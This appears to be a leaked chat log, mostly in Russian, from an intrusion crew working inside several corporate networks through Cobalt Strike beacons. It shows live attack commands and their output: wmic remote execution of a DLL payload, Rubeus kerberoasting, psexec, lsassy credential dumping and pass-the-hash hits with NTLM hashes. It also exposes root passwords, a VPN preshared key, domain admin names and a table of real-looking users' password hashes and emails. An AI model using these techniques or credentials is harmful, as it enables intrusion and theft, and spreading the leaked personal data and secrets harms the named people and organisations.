```это локальное обращение ведьто /node указывать нет смыслаесли ты на дедике делаешь в рамках своей же машинытам есть только АДя пошёл доделывать за user4да с тем же успехом можно спросить если на дедике то почему вообще вмикзачем /node?если на дедике - то почему через вмик на другой хост?и хватает там cmd /c в начале@tl2 он на дедике пробуетзачем так если я это прям все делаювмик запускает процес для контекста удаленной машины и сохраняет результат соответственно на ней жетратим время

ls \\169.254.195.31\c$\ProgramDataеще 1 ошибкадругое дело, уже путь верный``
beacon> shell wmic /node:169.254.195.31 process call create "ping google.com>C:\ProgramData\SOOQA.txt"
[*] Tasked beacon to run: wmic /node:169.254.195.31 process call create "ping google.com>C:\ProgramData\SOOQA.txt"
[+] host called home, sent: 119 bytes
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 1156;
	ReturnValue = 0;
};




 Directory of C:\ProgramData

09/28/2020 01:22 PM <DIR> Applications
10/05/2020 11:48 AM <DIR> Binary Fortress Software
10/02/2020 03:52 PM 25,604 cn-matches.txt
10/03/2020 04:18 PM 6,518 hostnames.txt
10/02/2020 03:37 PM 0 matches-share.txt
10/02/2020 05:37 PM 818,088,516 matches_sysvol.rar
09/23/2020 12:31 PM <DIR> Mozilla
10/07/2020 09:03 PM 482 output.txt
09/28/2020 02:11 PM <DIR> Package Cache
10/03/2020 04:18 PM 511 ping.bat
10/07/2020 07:01 PM <DIR> regid.1991-06.com.microsoft
10/03/2020 08:19 PM 18,878 result.txt
               7 File(s) 818,140,509 bytes
               5 Dir(s) 168,773,038,080 bytes free

```вообще кая-то болезненная штука этот пингопять что ли внимание на ping обратить``
beacon> shell wmic /node:169.254.195.31 process call create "ping google.com>C:\Windows\Temp\SOOQA.txt"
C:\ProgramData
```да ты серьезно дабляа то что хуйней страдаем это ты прав)разбирайсяя щас повторю снова забудешьхоть логи с кобы выкачивайте и там будут регулярные командызаписывайте, запоминайтеменя это заебываетя не повторительуже раз писал кака ошибкане говорю потому что уже разбирали``
beacon> shell wmic /node:169.254.195.31 process call create "ping google.com>C:\Windows\Temp\SOOQA.txt"
[*] Tasked beacon to run: wmic /node:169.254.195.31 process call create "ping google.com>C:\Windows\Temp\SOOQA.txt"
[+] host called home, sent: 120 bytes
beacon> shell dir
[*] Tasked beacon to run: dir
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 5764;
	ReturnValue = 0;
};


[+] host called home, sent: 34 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is 4C8B-2027

 Directory of C:\ProgramData

09/28/2020 01:22 PM <DIR> Applications
10/05/2020 11:48 AM <DIR> Binary Fortress Software
10/02/2020 03:52 PM 25,604 cn-matches.txt
10/03/2020 04:18 PM 6,518 hostnames.txt
10/02/2020 03:37 PM 0 matches-share.txt
10/02/2020 05:37 PM 818,088,516 matches_sysvol.rar
09/23/2020 12:31 PM <DIR> Mozilla
10/07/2020 09:03 PM 482 output.txt
09/28/2020 02:11 PM <DIR> Package Cache
10/03/2020 04:18 PM 511 ping.bat
10/07/2020 07:01 PM <DIR> regid.1991-06.com.microsoft
10/03/2020 08:19 PM 18,878 result.txt
               7 File(s) 818,140,509 bytes
               5 Dir(s) 168,773,058,560 bytes free

``ты говоришь время тикает нет сказать в чем конкретно ошибка хуйней страдаемя не вижу что ты сделалгде команда выводчто не отработалонихуяне отработалочто надо проверить1+1где проебпинг во вмик не тебя пинг работаеттак блять подумаймне саиглобал в дедик выводить?да всмыслея и не понял))))))[ ](https://mediaeveryone.com/group/saiglobal-com?msg=fGGWwcFkJjfFHdZuE) а то скинул со вмикомчтож ты не сказали уже прям внутри делаешь пингтак ты уже открыл доступаа``
beacon> shell ping google.com > C:\ProgramData\output.txt
[*] Tasked beacon to run: ping google.com > C:\ProgramData\output.txt
[+] host called home, sent: 74 bytes
beacon> cd C:\ProgramData
[*] cd C:\ProgramData
[+] host called home, sent: 22 bytes
beacon> shell dir
[*] Tasked beacon to run: dir
[+] host called home, sent: 34 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is 4C8B-2027

 Directory of C:\ProgramData

09/28/2020 01:22 PM <DIR> Applications
10/05/2020 11:48 AM <DIR> Binary Fortress Software
10/02/2020 03:52 PM 25,604 cn-matches.txt
10/03/2020 04:18 PM 6,518 hostnames.txt
10/02/2020 03:37 PM 0 matches-share.txt
10/02/2020 05:37 PM 818,088,516 matches_sysvol.rar
09/23/2020 12:31 PM <DIR> Mozilla
10/07/2020 09:03 PM 482 output.txt
09/28/2020 02:11 PM <DIR> Package Cache
10/03/2020 04:18 PM 511 ping.bat
10/07/2020 07:01 PM <DIR> regid.1991-06.com.microsoft
10/03/2020 08:19 PM 18,878 result.txt
               7 File(s) 818,140,509 bytes
               5 Dir(s) 168,773,152,768 bytes free


```сразу команда - выводотработак ребут былща мне её заново соспавнят, она провисла на 19 часова на дедике такая команда отработает?``
beacon> shell wmic /node:10.225.10.200 process call create "ping google.com>C:\Windows\Temp\output.txt"
[*] Tasked beacon to run: wmic /node:10.225.10.200 process call create "ping google.com>C:\Windows\Temp\output.txt"
[+] host called home, sent: 120 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 3660;
	ReturnValue = 0;
};

```скажи еще как пингуешь хосты оттуда)часики тикаютсюда не пускает иди дальшеу тебя есть фул ад, хеши и прочееоткрой любой другой серверdatacenter.localкакой домен?файла на той машине нетпытаюсь оттуда гугл пингануть с выводом в файлвнешку видит?как быть?закинул на 10.225.10.200 дэлку и запустил, выдало:
```
beacon> shell wmic /node:10.225.10.200 process call create "rundll32 C:\Windows\Temp\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.225.10.200 process call create "rundll32 C:\Windows\Temp\x64.dll entryPoint"
[+] host called home, sent: 121 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 964;
	ReturnValue = 0;
};
```

Делка отработала и удалилась, но сессии нет, процесса на удалённой машине тоже[ ](https://mediaeveryone.com/group/saiglobal-com?msg=pAQcZLTgxornyJwtC) @user4+это мнеили зачем сообщение выше?saiglobal.com это их траст?[ ](https://mediaeveryone.com/group/saiglobal-com?msg=AqTqJRs2DTrERaaWP) 1[ ](https://mediaeveryone.com/group/saiglobal-com?msg=GQEJAdZqC2XPm7pez) 2[ ](https://mediaeveryone.com/group/saiglobal-com?msg=go37ZE2uk9zwPiWgn) 1?это ктоУспешно отпингованые трасты
```
saig.frd.global [10.210.8.236]
datacenter.local [10.225.10.200]
frd.global [10.225.12.1]
SaigProd.local [10.195.100.1]
c360.local [10.195.43.2]
legalco.local [10.195.23.1]
```сейчас зальюя снял тамтам где все требования выполненывезде найдены АВ, насы и прочее?так, тут , получается, отработаны и мы их не трогаем:
datcenter.local
c360.local
standard
legalco.local
frd.global

всё верно?никсовые впски``
```
192.169.6.100
u: root
p: DG8mZZyB
---
192.52.167.104
u: root
p: PeEDMf5q
```
``друзья, совсем нет сил, я отчаливаю на сегондя, если получится поднять еще какую сеть помимо той что подняли до нужных прав - и будут силы - доберитесь домен контроллера и положите в слип на 180 пару тройку серверных сесийорошо бы ага)а че, хорошо бы))))ага
автопавнну ты даешь)загоняешь машины пачкой - куда подходят права - там снимется лсаас и выплюнет в консольеб, а я уже размечтался...(или с каждой руками дампать лсаасна каждойпросто тебе не надо создавать сессиюсамо собой это работает только на те тачки куда у тебя админские креды естьда причем тут.... ох.......посмотри на скринЛА наверно безсмысленно, потому что на тачке ДА он не админ нифигаслушай.
это уже несерьезно.
я не переводчик очевидных статей все таки`[<domain>/]<user>[:<password>]@<target>` тут что указывать?ну а что тут не понятно?)`lsassy [--hashes [LM:]NT] --dumppath /share/path/to/dump.dmp [<domain>/]<user>[:<password>]@<target>`что? ты о чем вообще?)то есть запускать без указания кредов с целью на тачку где сидит ДА?они ж просто ходят по доступнымну конечнотолько у меня админы то локальные и там где ДА сидят они не админы. Это проканает?ага щас запробую)@user4 к твоей проблеме кстати подходит отличноэто у кого много тачек с админ правами но нет нужных юзеровhttps://securityonline.info/lsassy-extract-credentials-from-lsass-remotely/ждем привычный часофнулся видимоПодвистут у нас нет ДА?`ad.happay.in`https://www.sonicwall.com/support/knowledge-base/how-to-export-the-rcf-configuration-file-from-sonicwall-and-import-it-into-global-vpn-client/170505596612216/https://www.sonicwall.com/support/knowledge-base/how-can-i-configure-wan-groupvpn-for-connecting-with-global-vpn-client/170505850768290/https://www.sonicwall.com/``
<?xml version="1.0" standalone="yes"?>
<SW_Client_Policy version="9.0">
<Connections>
<Connection name="GroupVPN_C0EAE4F8F220">
<Flags>
<UseDHCP>1</UseDHCP>
<TrafficRestrictions>2</TrafficRestrictions>
<SetAsDefaultRoute>0</SetAsDefaultRoute>
<CacheXauth>2</CacheXauth>
<WiFiSecEnforced>0</WiFiSecEnforced>
</Flags>
<PersonalFirewall>
<LANPrimaryIP>192.168.1.3</LANPrimaryIP>
</PersonalFirewall>
<Peer>
<HostName>111.93.129.174</HostName>
</peer>
<Phase1Params>
<ExchangeType>4</ExchangeType>
<AuthenticationMethod>65001</AuthenticationMethod>
<PresharedKey>39464642424631363643424635374341</PresharedKey>
<DHGroupValue>1</DHGroupValue>
<EncryptionAlgorithm>5</EncryptionAlgorithm>
<EncryptAlgoKeyLen>0</EncryptAlgoKeyLen>
<HashAlgorithm>2</HashAlgorithm>
<Lifetime>1:28800</Lifetime>
<IDType>2</IDType>
<IDData>47726F757056504E</IDData>
</Phase1Params>
<UserAuthentication>
<Expected>1</Expected>
</UserAuthentication>
<Phase2Params>
<ProtocolID>3</ProtocolID>
<EncapsulationMode>1</EncapsulationMode>
<AHTransform>3:32</AHTransform>
<ESPTransform>3:2:0:32</ESPTransform>
<Lifetime>1:3600</Lifetime>
<DHGroupValue>0</DHGroupValue>
<DestinationNetwork>192.168.1.3:255.255.255.255</DestinationNetwork>
</Phase2Params>
</Connection>
</Connections>
</SW_Client_Policy>

```gvcauto.logпоэтому и спросил В КАКОМ ТЕРМИНАЛЕи для винды lnkinfo не знаюя думал вы у него на пк проверяетев терминале спросил потому что $ - не cmdТы ярылки не чекал ниразу?В своем на компе через lnkinfo*.rcfв каком терминале?В терминаледалее ~/Desktop/New_New/lnk$ lnkinfo "Connection to 106.51.226.49.lnk "команда?Руками)чем сняли?```
	Description: Connection to 111.93.129.174
	Relative path : ..\..\Program Files\SonicWall\Global VPN Client\SWGVC.exe
	Working directory : C:\Program Files\SonicWall\Global VPN Client
	Command line arguments : /E "111.93.129.174"

```
```
	Description : Connection to 106.51.226.49
	Relative path : ..\..\Program Files\SonicWall\Global VPN Client\SWGVC.exe
	Working directory : C:\Program Files\SonicWall\Global VPN Client
	Command line arguments : /E "106.51.226.49"


``спасибо``
28b3c260711a284559121c3986ca93b65df28706a43fe7a2234a0fdf79904268 2039005F
20733646ed4d68a7243b06d6c2f81c64a60ea0a5e309219595d1493a9b59d1c5 382A0473
e51ae5f54a13577b4eedab3d4c2836b644757c7c99b9d865aa39918079d7844c 51692370
a38df217726c7869140d147ae1c06c3b3ae3dd9f513872614dcbdbb9fc80822e AF2319AB
a10e69c47b04ee897a784f8c55cc222c26d034dbfc622826586e31f429848383 9569F458
06dee60f4c72a87a1a86e3ffca40c5906a83f9cf1394b27e6d7b13d3d034da4a 564273C6
42ca67a00c3692ccdf792e01e3bd25a5a66ddcce5ff6bc4314e804cc6e22d12c 1D849510
03ac674216f3e15c761ee1a5e255f067953623c8b388b4459e13f978d7c846f4 1234
a6b2ff167350bc4e65ce22f5d41a31cf5db73d5228d377b254a77f2df5967be7 CBCB9373
fe03e51728e1515d9bd9182cedcdd6cb897cd4829e48cf2cacf3d83cda4d2ab1 127010CA
fd5ad27c0a5c5e8046ba867ac37b42c72ca9366783b6129940e8deca384fb945 FFC77685
2cb025bc62d110e7beec6c45fbfe795352c4194b751e1a6e18df3c47a0cd79f7 BACBC590
c5e9cbd9bb4223ce7750d64000e82c0fc8664a666feba9fdbd994a9530c4d6c8 D4FF4357
9dc9c5a3aafdd7856a724723a9a92672a5c86165f360c634658d76f428550b6e CDDAC102
``@tl1 хэши чекнуть можно?``

User Id User Password Email Id Middle Name Last Name First Name
HP20196201010102538109914HP 8eb99a99dde701da48e6150d801ad8c489e0de5599a11fd7e7bd18ebc32a64a9 harjeetroadlines95+11@gmail.com Singh Vinod
HP20196201010142798572023HP 0293fbd8830316737c35ec729612de73c204e35d14c8d627169ec4e2a2e3af9a harjeetroadlines95+12@gmail.com Shinde Suresh
HP2019620101016624821422HP fa2add98c1722c776b4e85a66c88fdf49a5c395ba64471fb0011d2ab1c7897b1 harjeetroadlines95+45@gmail.com Singh Daljeet
HP20196201010184360973695HP 28b3c260711a284559121c3986ca93b65df28706a43fe7a2234a0fdf79904268 harjeetroadlines95+15@gmail.com singh Tulsi
HP20196201010225863663965HP 20733646ed4d68a7243b06d6c2f81c64a60ea0a5e309219595d1493a9b59d1c5 harjeetroadlines95+48@gmail.com bhaurao Shelke Manik
HP20196201010269661194147HP 6bbfa3023e958dd30762b74abc3be2d37011b9471c4c6848550b4c268cabaa9f harjeetroadlines95+53@gmail.com Shoib Mohd
HP20196201010312857813028HP de5d3c3ab9122d51c37a0dab08ba1a96d8e276b44a4888b837a3326e5a7d1fb0 harjeetroadlines95+19@gmail.com Kumar yadav Ajay
HP20196201010355940386359HP 0724211d5b4f0a3885a48eb47c8bf698578f6582127f76f517daa083046f2d1f harjeetroadlines95+29@gmail.com Prasad yadav Bhola
HP20196201010396384455535HP e51ae5f54a13577b4eedab3d4c2836b644757c7c99b9d865aa39918079d7844c harjeetroadlines95+24@gmail.com Yadav Santosh
HP2019620101059773261151HP 64a4837d5761bb401f089c999cde3ec2316195f46e602d30c0089a2644d34c09 harjeetroadlines95+5@gmail.com Pandey Sanjay
HP2019620106501991951580HP 18b0b6265c6965aea7d75fa147094d89cbedac2153540cbd1e7ffa829cf28000 harjeetroadlines95+14@gmail.com Ali Farman
HP2019620106543854136534HP a38df217726c7869140d147ae1c06c3b3ae3dd9f513872614dcbdbb9fc80822e harjeetroadlines95+52@gmail.com Kumar yadav Manoj
HP2019620106583623832858HP a10e69c47b04ee897a784f8c55cc222c26d034dbfc622826586e31f429848383 harjeetroadlines95+44@gmail.com Ahmed Mustaq
HP2019620107126389961096HP 4d081a605ec6f5c420b4f0498efccd6af3880b3b4abbeb700eca35d5a14cffb6 harjeetroadlines95+32@gmail.com singh Amritpal
HP2019620107166277311185HP 06dee60f4c72a87a1a86e3ffca40c5906a83f9cf1394b27e6d7b13d3d034da4a harjeetroadlines95+36@gmail.com Sharma Surendra
HP2019620107208559417976HP 42ca67a00c3692ccdf792e01e3bd25a5a66ddcce5ff6bc4314e804cc6e22d12c harjeetroadlines95+49@gmail.com Singh Paramjit
HP2019620107248623258019HP 9b3957be4c45929c47d7cf447105a2488460da7044b147aa715f2c3dd55f32f4 harjeetroadlines95+43@gmail.com Khan Sohel
HP201962010726835843708HP 03ac674216f3e15c761ee1a5e255f067953623c8b388b4459e13f978d7c846f4 harjeetroadlines95+38@gmail.com Yadav Chandrajeet
HP2019620107291687742668HP 564b77746834fac1a3fbd08bb75c5ca418ae22c32ec6fd99697e2c9de5beee17 harjeetroadlines95+22@gmail.com Kuddus Abdul
HP2019620107332167491575HP 8acc6699e1efd4e2d089011a45e55c7f17fd09c34e89a9a4c5259aa1ed218b31 harjeetroadlines95+23@gmail.com singh Raviraj
HP2019620107374005617063HP ef9505d24415cc7f19baef0bbf47f39e9f5e69f26fb82ee2769af3ec020f2f36 harjeetroadlines95+51@gmail.com Saroj Lalji
HP2019620107418163901165HP 43f079f13bbc55a963b810e7f6a101c6e234634dccd27898d4be234b94fc0351 harjeetroadlines95+40@gmail.com Yadav Bhuneshwar
HP201962010745425411913HP b1448c1fe3d2d0252198101ac75580a38cd24296453736f2698800ce8291a9a7 harjeetroadlines95+9@gmail.com kumar Sushil
HP2019620107459870763681HP a6b2ff167350bc4e65ce22f5d41a31cf5db73d5228d377b254a77f2df5967be7 harjeetroadlines95+20@gmail.com Singh Sukhdev
HP2019620107508772408904HP 39f504edb611f64f85ac2fedda7965a966df33c21a0764b70d122b69bc10a1ef harjeetroadlines95+1@gmail.com Faisal Mohd
HP201962010755579004247HP e4b4c3e134a9e29c2ec3b483f4b5388a742165d49b9fa6896ca09ae5f4742665 harjeetroadlines95+7@gmail.com S Yadav Ramraj
HP2019620107594925018904HP c16fe0b02048b17c3193c17e5c3418dbb1341b5d15b73a90c7111dc960b6dea3 harjeetroadlines95+33@gmail.com singh Navkarandeep
HP201962010787333855982HP fe03e51728e1515d9bd9182cedcdd6cb897cd4829e48cf2cacf3d83cda4d2ab1 harjeetroadlines95+21@gmail.com Kumar Akhilesh
HP201962010816555033866HP edb5656900c6b3e667de00038bda04127868ee861f2b5225afadb6960b69cc50 harjeetroadlines95+6@gmail.com Kumar Pradeep
HP2019620108202746958327HP 26c2e1daf8a8174bc999e72b1b9c92c3477977884bad3f889735e4e45a324dda harjeetroadlines95+26@gmail.com Yadav Vinod
HP2019620108263742055697HP 58895edc24dbf57a57518af35ebb42c33dffe8cc94bb8851c962a55e5a960aad harjeetroadlines95+46@gmail.com Yadav Rambrij
HP2019620108304916009069HP caf7d1996d96a5ce4f25cf82250d2d2825785a295d0ca05106f055d20392c9e7 harjeetroadlines95+13@gmail.com Yadav Yogendra
HP2019620108346644272108HP e844104206d88758840a8f77e6dcc0f9b917e1b3d3e11655297c6340ce2f3734 harjeetroadlines95+3@gmail.com Yadav Ramdaras
HP201962010836190078047HP 025750f879fba28d4d251ce0f2d023a17f4114d2e9e4f1e64e401e71559b414d harjeetroadlines95+54@gmail.com singh Vinod
HP2019620108387071096273HP 419e4e274b748c7a247c6e0edbccc7e2d04244c915f2f73fe8509b31cecb29e7 harjeetroadlines95+47@gmail.com Khan Salman
HP2019620108428759387650HP 817953730feb1dddc4aeff1098b1ca4781ca8e65456872be24f3f904589003 harjeetroadlines95+27@gmail.com kumar tiwari Abhimanyu
HP2019620108472108246672HP 4cc427c04edca8e7ff1b9c8301842d5f0b1d1cd40e99d95cdf036beafac0e7e1 harjeetroadlines95+8@gmail.com mishra Kripashankar
HP2019620108511300311348HP 187db3e24a345628fbd7f897a1e76a55ab5e22c01561d52b239f840e67bd59fb harjeetroadlines95+41@gmail.com Singh Mangal
HP2019620108554546177564HP fd5ad27c0a5c5e8046ba867ac37b42c72ca9366783b6129940e8deca384fb945 9881318592@abcxyz.iin Kumar singh
HP2019620108595175932621HP 2cb025bc62d110e7beec6c45fbfe795352c4194b751e1a6e18df3c47a0cd79f7 harjeetroadlines95+35@gmail.com Singh Gurbinder
HP201962010877746921752HP 753d8a9ccd60617d73ff1c2b945ee1374e80fd3e9bbc8485c020a3ae46c792f8 harjeetroadlines95+10@gmail.com Pandey Kuldeep
HP2019620109127897736262HP fdb9c838fd85f213933cb7342d6d21d7508dbf31b9ca8ad1c00b672c04fa87e8 harjeetroadlines95+39@gmail.com Asare Ram
HP2019620109217794143490HP 0f91dbf8da8988f7f79476e17eb87b294c086142f6a452fa2332285e3c40e402 harjeetroadlines95+31@gmail.com kumar saroj Harihar
HP2019620109261508147074HP 15c4e7a3d2c1e7983a9ff4f59d6a701b965f1d0ad11038c7a4b8a44e9f48a34e harjeetroadlines95+34@gmail.com saroj Rammurat
HP2019620109303478651104HP f44f1c235edd95e7f958fd3b6bcdb41a04daecfe3f99d9499187a9d9d5fe2876 harjeetroadlines95+2@gmail.com yadav Chotelal
HP201962010938554818780HP c5e9cbd9bb4223ce7750d64000e82c0fc8664a666feba9fdbd994a9530c4d6c8 harjeetroadlines95+30@gmail.com Singh Ravendra
HP2019620109397620666116HP 4c5041f14fbe628c79c03a4f302afcfee51d7ee7daec50747b9b619fb1211f27 harjeetroadlines95+17@gmail.com Sahani Jitendra
HP201962010944646843344HP 5ba88e4137d7233d3c42e36b7f9dcca9138504343f89324641d286ba52ffbf80 harjeetroadlines95+4@gmail.com Yadav ShivPrasad
HP2019620109488162287045HP 9dc9c5a3aafdd7856a724723a9a92672a5c86165f360c634658d76f428550b6e harjeetroadlines95+50@gmail.com Singh DALJEET
HP2019620109529879135556HP 54d6154b9ef93bb6ac2e7db335913102dce130de7a081a19a4ea0dd5cff898ae harjeetroadlines95+18@gmail.com pratap yadav Mahendra
HP2019620109573398884992HP c28de86389b6ebc8e646d13602d153b2ffdad50e69c69e6376e10c0c6dab7 harjeetroadlines95+37@gmail.com Kumar singh Raj
HP201962010987142216555HP 769c174ad96ac9a01348043f932c22cbde1a65c934354b273db481b329864722 harjeetroadlines95+25@gmail.com Sankar Sankar
``````
[-] Could not open service control manager on \\192.168.1.169: 1722
``как понять 1722 ?не понялв смысле ?1722``
 am connecting services.msc to other computer from my machine and got ... AM (From:Configuration Manager Software Updates Management).
``````
beacon> remote-exec psexec \\192.168.1.169 process list
[*] Tasked beacon to run 'process list' on \\192.168.1.169 via Service Control Manager
[-] Could not open service control manager on \\192.168.1.169: 1722
[+] host called home, sent: 1777 bytes
``````
user 2-2[ABINASHP]abinash.pattnayak/5776|2020Oct07 19:52:33> remote-exec psexec \\192.168.9.42 ipconfig /flushdns
[Tasked beacon to run 'ipconfig /flushdns' on \\192.168.9.42 via Service Control Manager
[-] Could not open service control manager on \\192.168.9.42: 5
[+] host called home, sent: 2011 bytes
[-] Could not open service control manager on \\192.168.9.42: 5
```psexec_command тогда``
beacon> run wmic /node:192.168.1.169 process list brief
[*] Tasked beacon to run: wmic /node:192.168.1.169 process list brief
[+] host called home, sent: 61 bytes
[+] received output:
Node - 192.168.1.169

ERROR:

Description = The RPC server is unavailable.





``или архитектурузапросите список процессовпоробуйте вмик?
beacon> run dir \\192.168.9.169\ADMIN$
[*] Tasked beacon to run: dir \\192.168.9.169\ADMIN$
[+] host called home, sent: 44 bytes
[-] could not spawn dir \\192.168.9.169\ADMIN$: 2
``пробуйте сразу шару `ADMIN$`у других двух так же?нетshell не работает?`could not spawn?
beacon> run dir \\192.168.9.42\C$
[*] Tasked beacon to run: dir \\192.168.9.42\C$
[+] host called home, sent: 39 bytes
[-] could not spawn dir \\192.168.9.42\C$: 2]
```а если просто `dir \\192.168.9.42\C$`?``
beacon> run whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 24 bytes
[+] received output:
ad\abinash.pattnayak

``shell whoami?
beacon> run net use * \\192.168.9.42\C$ /persistent:no
[Tasked beacon to run: net use * \\192.168.9.42\C$ /persistent:no
[+] host called home, sent: 60 bytes
[+] received output:
The password is invalid for \\192.168.9.42\C$.
```

```
beacon> run net use * \\192.168.9.169\C$ /persistent:no
[Tasked beacon to run: net use * \\192.168.9.169\C$ /persistent:no
[+] host called home, sent: 61 bytes
[+] received output:
The password is invalid for \\192.168.9.169\C$.

Enter the user name for '192.168.9.169'.

```[ ](https://mediaeveryone.com/group/happay-in?msg=pkt4xfiMymwKJftue) почемуперешлите кеб на всякийПодключится к этим тачкам не получаетсяsudhirкерб ДА выше3 тачки с админ правами``
user 2-2[ABINASHP]SYSTEM */23308|2020Oct07 19:13:04> shell net group "Domain Admins" /dom
[*] Tasked beacon to run: net group "Domain Admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain ad.happay.in.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
abhinav.bhaskar Administrator anshul
chandan koushik.s mohit.goel
nitin.choudhary pritam sudhir
varun vivek.kumar
The command completed successfully.

``ммм``

beacon> net share \\192.168.9.169
[*] Tasked beacon to run net share on 192.168.9.169
[+] host called home, sent: 104505 bytes
[+] received output:
Shares at \\192.168.9.169:

 Share name Comment
 ---------- -------

[+] received output:
 ADMIN$ Remote Admin
 C$ Default share
 HP OfficeJet Pro 8710 PCL-3
 IPC$ Remote IPC
 print$ Printer Drivers
```
```
beacon> net share \\192.168.9.42
[*] Tasked beacon to run net share on 192.168.9.42
[+] host called home, sent: 104505 bytes
[+] received output:
Shares at \\192.168.9.42:

 Share name Comment
 ---------- -------

[+] received output:
 ADMIN$ Remote Admin
 C$ Default share
 IPC$ Remote IPC

```
```
beacon> net share \\192.168.1.185
[*] Tasked beacon to run net share on 192.168.1.185
[+] host called home, sent: 104505 bytes
[+] received output:
Shares at \\192.168.1.185:

 Share name Comment
 ---------- -------

[+] received output:
 ADMIN$ Remote Admin
 C$ Default share
 IPC$ Remote IPC

``````
user 2-2[ABINASHP]SYSTEM */23308|2020Oct07 19:09:59> execute-assembly Rubeus.exe kerberoast /format:hashcat /outfile:C:\ProgramData\Rubeus_hashes_full.txt
[Tasked beacon to run .NET program: Rubeus.exe kerberoast /format:hashcat /outfile:C:\ProgramData\Rubeus_hashes_full.txt
[+] host called home, sent: 320189 bytes
[+] received output:

   ______ _
  (_____ \ | |
   _____) )_ _| |__ _____ _ _ ___
  | __ /| | | | _ \| ___ | | | |/___)
  | | \ \| |_| | |_) ) ____| |_| |___ |
  |_| |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Searching the current domain for Kerberoastable users

[+] host called home, sent: 64 bytes
[+] received output:

[*] Total kerberoastable users : 1


[*] SamAccountName : sudhir
[DistinguishedName : CN=Sudhir Kumar. Thapa,OU=IT-Team,OU=Users,OU=HAPPAY,DC=ad,DC=happay,DC=in
[*] ServicePrincipalName: AgpmServer/HAPPAYADSERVER.ad.happay.in/ad.happay.in
[PwdLastSet : 25-09-2020 12:45:35
[*] Supported ETypes : RC4_HMAC_DEFAULT
[Hash written to C:\ProgramData\Rubeus_hashes_full.txt

[*] Roasted hashes written to : C:\ProgramData\Rubeus_hashes_full.txt

```в ручную чекаюнеттам много пк?тогда запуститеПока нетне получилось подняться ничем более?@tl1 можно запустить шарфайндер?``
User Password Email Id
Happay@81 isha_wattle@geojit.com
Happay@82 jasdeep_k@geojit.com
Happay@83 karmjeet_kaur@geojit.com
Happay@84 rohit_kumar@geojit.com
Happay@85 sumit_sharma@geojit.com
Happay@86 sunil_chhabra@geojit.com
Happay@87 joga_singh@geojit.com
Happay@88 kimat_r@geojit.com
Happay@89 om_parkash@geojit.com
Happay@90 puneet_p@geojit.com
Happay@91 shashank_jain@geojit.com
Happay@92 vishesh_k@geojit.com

``````
Happy@26265
Gopal@26265
Abinash@26265
````ad.happay.in [192.168.1.12]````
 HAPPAYADSERVER 192.168.1.2
 HAPPAYADCSERVER 192.168.1.12
``пожалуйстаспасибоuser7192.168.43.108user4``
[+] 192.168.1.2:445 - 192.168.1.2:445 - Success: '.\abinash.pattnayak:aad3b435b51404eeaad3b435b51404ee:b4e99243a0b9c8fa481d2307a26cc933'
``угу, но учетка не админа(``
[+] 192.168.9.212:445 - 192.168.9.212:445 - Success: '.\Admin:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865'
[+] 192.168.9.169:445 - 192.168.9.169:445 - Success: '.\Admin:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865'
[+] 192.168.9.42:445 - 192.168.9.42:445 - Success: '.\Admin:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865'
[+] 192.168.1.185:445 - 192.168.1.185:445 - Success: '.\Admin:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865'
``1) тестируй нормально, я говорил обновить АД
2) впн таки был отключен``
C:\Users\user>ping -n 1 BI-SANDBOX.evo.local
Ping request could not find host BI-SANDBOX.evo.local. Please check the name and try again.

C:\Users\user>ping -n 1 CHEECH.evo.local

Pinging CHEECH.evo.local [172.17.70.16] with 32 bytes of data:
Reply from 172.17.70.16: bytes=32 time=66ms TTL=126

Ping statistics for 172.17.70.16:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 66ms, Maximum = 66ms, Average = 66ms
``сейчас буду проверятьБез измененийPing request could not find host HQ-DC-2.evo.local. Please check the name and try again.а дк доступен?странно...Windows Server 2008пользовательские?На машины на которых шарилсяВОзможно vpn отвалился
Ping request could not find host BI-SANDBOX.evo.local. Please check the name and try again.да нет креды естьа они нужны?Под пользаком без прав+есть?ps commandя ждудавай нагрузкусамому интересноэто как так?у меня realtime prot включился сам))доступенneteric.comи нагрузку сразу если окя пиганудомен только дайдаps command подойдет?и нагрузкадомендана дедике?повислаи под сесией идется в азурпо моему у него дампается фв азур другой типок ходитEVO\bplehal
```
https://apps.sematext.com/ui/monitoring/19585/solrCloudOverviewReportPage
https://portal.azure.com/#@evo.com/resource/subscriptions/eaa8f156-823c-4beb-91bb-bd6703f0c0e6/resourceGroups/www-production/providers/microsoft.insights/components/evodotcom/overview
Можно попробовать под кредами да
http://evosolr.southcentralus.cloudapp.azure.com/solr/#/~cloud
```уже) спасибо)это надо у @user3 спрашиватьпривет, а напомни ссылку наш форум пожалуйстата оффа во входной же кобе была ещё одна сессия с этого домена, кто то её отрабатывал, закрепа нет?этот пользак только в трастах пусто?мб в этом дело... угу((```
'nbtstat' is not recognized as an internal or external command,
operable program or batch file.
``nbtstat не помогнет, я могу ошибаться какие то шз я брал из портскана. И так, брал хост нам делал пинг и по 24-й на 445 их в скан. Выходит что в теории он может быть с другого домена.то хостнейм ты и так знаешьесли он взят из ад_комп текущегоэээ стоп не понимаюне возвращает хост намеОн с текушего домена взят из ад_комп.только в рамках одного доменакроссдоменная авторизация так не сработаетя про хост который атакуем1 мин+а он точно от этого домена?+yesа креды валидные?``
